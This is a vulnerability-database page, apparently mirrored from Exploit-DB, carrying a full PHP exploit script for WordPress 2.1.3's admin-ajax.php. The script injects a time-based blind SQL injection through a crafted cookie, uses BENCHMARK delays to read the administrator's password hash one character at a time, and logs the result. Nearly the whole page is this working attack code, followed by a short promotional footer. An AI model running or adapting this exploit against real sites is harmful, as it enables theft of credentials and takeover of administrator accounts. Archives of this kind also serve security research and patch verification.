Lucene search

K

WordPress Core 2.1.3 - 'admin-ajax.php' SQL Injection Blind Fishing

🗓️ 21 May 2007 00:00:00Reported by waraxeType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 178 Views

WordPress Core 2.1.3 'admin-ajax.php' SQL Injection Blind Fishing exploit retrieves admin user's password hash using blind SQL injection to target specific characters in the hash by delaying probes and analyzing server responses

Show more
Code
<?php
error_reporting(E_ALL);
$norm_delay = 0;
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit
// written by Janek Vind "waraxe"
// http://www.waraxe.us/
// 21. may 2007
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$outfile = './warlog.txt';// Log file
$url = 'http://localhost/wordpress.2.1.3/wp-admin/admin-ajax.php';
$testcnt = 300000;// Use bigger numbers, if server is slow, default is 300000
$id = 1;// ID of the target user, default value "1" is admin's ID
$suffix = '';// Override value, if needed
$prefix = 'wp_';// WordPress table prefix, default is "wp_"
//======================================================================

echo "Target: $url\n";
echo "sql table prefix: $prefix\n";

if(empty($suffix))
{
	$suffix = md5(substr($url, 0, strlen($url) - 24));
}

echo "cookie suffix: $suffix\n";

echo "testing probe delays \n";

$norm_delay = get_normdelay($testcnt);
echo "normal delay: $norm_delay deciseconds\n";

$hash = get_hash();

add_line("Target: $url");
add_line("User ID: $id");
add_line("Hash: $hash");

echo "\nWork finished\n";
echo "Questions and feedback - http://www.waraxe.us/ \n";
die("See ya! :) \n");
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
function get_hash()
{
	$len = 32;
	$field = 'user_pass';
	$out = '';
	
	echo "finding hash now ...\n";
	
	for($i = 1; $i < $len + 1; $i ++)
	{
		$ch = get_hashchar($field,$i);
		echo "got $field pos $i --> $ch\n";
		$out .= "$ch";
		echo "current value for $field: $out \n";
	}
	
	echo "\nFinal result: $field=$out\n\n";
	
	return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($field,$pos)
{
	global $prefix, $suffix, $id, $testcnt;
	$char = '';
	$cnt = $testcnt * 4;
	$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
	$ipattern = " UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";

	// First let's determine, if it's number or letter
	$inj = sprintf($ipattern, $prefix, $id, ">57");
	$post = sprintf($ppattern, $suffix, $inj, $suffix);
	$letter = test_condition($post);
	
	if($letter)
	{
		$min = 97;
		$max = 102;
		echo "char to find is [a-f]\n";
	}
	else
	{
		$min = 48;
		$max = 57;
		echo "char to find is [0-9]\n";
	}

	$curr = 0;
	
	while(1)
	{
		$area = $max - $min;
		if($area < 2 )
		{
			$inj = sprintf($ipattern, $prefix, $id, "=$max");
			$post = sprintf($ppattern, $suffix, $inj, $suffix);
			$eq = test_condition($post);
			
			if($eq)
			{
				$char = chr($max);
			}
			else
			{
				$char = chr($min);
			}
			
			break;
		}
		
		$half = intval(floor($area / 2));
		$curr = $min + $half;
		
		$inj = sprintf($ipattern, $prefix, $id, ">$curr");
		$post = sprintf($ppattern, $suffix, $inj, $suffix);
		
		$bigger = test_condition($post);
		
		if($bigger)
		{
			$min = $curr;
		}
		else
		{
			$max = $curr;
		}

		echo "curr: $curr--$max--$min\n";
	}
	
	return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
	global $url, $norm_delay;
	$bret = false;
	$maxtry = 10;
	$try = 1;
	
	while(1)
	{
		$start = getmicrotime();
		$buff = make_post($url, $p);
		$end = getmicrotime();
	
		if($buff === '-1')
		{
			break;
		}
		else
		{
			echo "test_condition() - try $try - invalid return value ...\n";
			$try ++;
			if($try > $maxtry)
			{
				die("too many tries - exiting ...\n");
			}
			else
			{
				echo "trying again - try $try ...\n";
			}
		}
	}
	
	$diff = $end - $start;
	$delay = intval($diff * 10);
	
	if($delay > ($norm_delay * 2))
	{
		$bret = true;
	}
	
	return $bret;
}
///////////////////////////////////////////////////////////////////////
function get_normdelay($testcnt)
{
	$fa = test_md5delay(1);
	echo "$fa\n";
	$sa = test_md5delay($testcnt);
	echo "$sa\n";
	$fb = test_md5delay(1);
	echo "$fb\n";
	$sb = test_md5delay($testcnt);
	echo "$sb\n";
	$fc = test_md5delay(1);
	echo "$fc\n";
	$sc = test_md5delay($testcnt);
	echo "$sc\n";
	
	$mean_nondelayed = intval(($fa + $fb + $fc) / 3);
	echo "mean nondelayed - $mean_nondelayed dsecs\n";
	$mean_delayed = intval(($sa + $sb + $sc) / 3);
	echo "mean delayed - $mean_delayed dsecs\n";
	
	return $mean_delayed;
}
///////////////////////////////////////////////////////////////////////
function test_md5delay($cnt)
{
	global $url, $id, $prefix, $suffix;
	
	// delay in deciseconds
	$delay = -1;
	$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
	$ipattern = ' UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH(user_pass)>31,BENCHMARK(%d,MD5(1337)),3)/*';
	$inj = sprintf($ipattern, $prefix, $id, $cnt);
	$post = sprintf($ppattern, $suffix, $inj, $suffix); 

	$start = getmicrotime();
	$buff = make_post($url, $post);
	$end = getmicrotime();
	
	if(intval($buff) !== -1)
	{
		die("test_md5delay($cnt) - invalid return value, exiting ...");
	}

	$diff = $end - $start;
	$delay = intval($diff * 10);

	return $delay;
}
///////////////////////////////////////////////////////////////////////
function getmicrotime() 
{ 
    list($usec, $sec) = explode(" ", microtime()); 
    return ((float)$usec + (float)$sec); 
} 
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
	$ch = curl_init();
	$timeout = 120;
	curl_setopt ($ch, CURLOPT_URL, $url);
	curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
	curl_setopt($ch, CURLOPT_POST, 1); 
	curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields); 
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
	curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');
	
	if(!empty($cookie))
	{
		curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
	}
 
	if(!empty($referer))
	{
		curl_setopt ($ch, CURLOPT_REFERER, $referer);
	}

	if($headers === TRUE)
	{
		curl_setopt ($ch, CURLOPT_HEADER, TRUE);
	}
	else
	{
		curl_setopt ($ch, CURLOPT_HEADER, FALSE);
	}

	$fc = curl_exec($ch);
	curl_close($ch);
	
	return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($buf)
{
	global $outfile;
	
	$buf .= "\n";
	$fh = fopen($outfile, 'ab');
	fwrite($fh, $buf);
	fclose($fh);
	
}
///////////////////////////////////////////////////////////////////////
?>

# milw0rm.com [2007-05-21]

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
21 May 2007 00:00Current
7.4High risk
Vulners AI Score7.4
EPSS0.023
178
.json
Report